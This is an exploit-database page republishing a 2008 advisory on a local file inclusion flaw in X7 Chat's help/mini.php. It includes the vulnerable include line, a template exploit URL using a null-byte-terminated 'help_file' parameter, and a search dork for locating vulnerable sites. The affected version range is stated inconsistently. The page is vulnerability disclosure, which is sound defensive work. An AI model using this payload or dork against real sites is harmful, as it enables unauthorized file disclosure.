X7 Chat - exploit.company

vendor:

X7 Chat

by:

NoGe

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: X7 Chat

Affected Version From: 2.0.1A1

Affected Version To: 2.0.5.1

Patch Exists: YES

Related CWE: N/A

CPE: a:x7chat:x7_chat

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability

X7 Chat version 2.0.5.1 is vulnerable to a Local File Inclusion vulnerability. This vulnerability is due to the application failing to properly sanitize user-supplied input to the 'help_file' parameter of the 'help/mini.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters to the vulnerable script. This can allow the attacker to include arbitrary local files from the web server, resulting in the disclosure of sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

====================================================================


  [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability

       Software : X7 Chat version 2.0.5.1
       Vendor   : http://x7chat.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


====================================================================


  [o] Vulnerable file

       help/mini.php

        include("./help/{$_GET['help_file']}");



  [o] Exploit

       http://localhost/[path]/help/mini.php?help_file=[LFI]%00



  [o] Dork

       "powered by x7 chat"


====================================================================


  [o] Greetz

       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ k1tk4t
       skulmatic olibekas ulga Cungkee str0ke

        
====================================================================

# milw0rm.com [2008-09-27]